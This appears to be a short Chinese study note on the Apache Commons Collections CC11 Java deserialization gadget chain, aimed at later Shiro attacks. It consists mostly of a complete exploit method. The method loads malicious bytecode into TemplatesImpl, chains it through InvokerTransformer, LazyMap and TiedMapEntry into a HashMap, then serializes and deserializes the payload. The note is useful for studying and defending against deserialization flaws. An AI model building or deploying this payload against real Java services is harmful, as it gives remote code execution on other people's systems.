Java反序列化之CC11

环境配置

Common Collections: 3.2.1

jdk8u71

核心思想

这条链子是为后面的shiro反序列化服务的可以不通过Transform数组来实现反序列化

TemplateImpl->InvokerTransformer->LazyMap->TieMapEntry->HashMap

EXP

    public static void main(String[] argc) throws Exception {
        Field field;

        TemplatesImpl templates = new TemplatesImpl();
        byte[] evil = Files.readAllBytes(Paths.get("calc.class"));

        field = TemplatesImpl.class.getDeclaredField("_name");
        field.setAccessible(true);
        field.set(templates, "P3ngu1nW");

        field = TemplatesImpl.class.getDeclaredField("_bytecodes");
        field.setAccessible(true);
        field.set(templates, new byte[][]{evil});

        field = TemplatesImpl.class.getDeclaredField("_tfactory");
        field.setAccessible(true);
        field.set(templates, new TransformerFactoryImpl());

        Transformer transformer = new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});
        Map lazyMap = LazyMap.decorate(new HashMap<Object, Object>(), transformer);
        Map tmp = new HashMap<>();

        TiedMapEntry tiedMapEntry = new TiedMapEntry(tmp, templates);

        HashMap<Object, Object>hashMap = new HashMap<Object, Object>();
        hashMap.put(tiedMapEntry, 1);

        field = TiedMapEntry.class.getDeclaredField("map");
        field.setAccessible(true);
        field.set(tiedMapEntry, lazyMap);

        serialize(hashMap);
        unserialize("ser.bin");
    }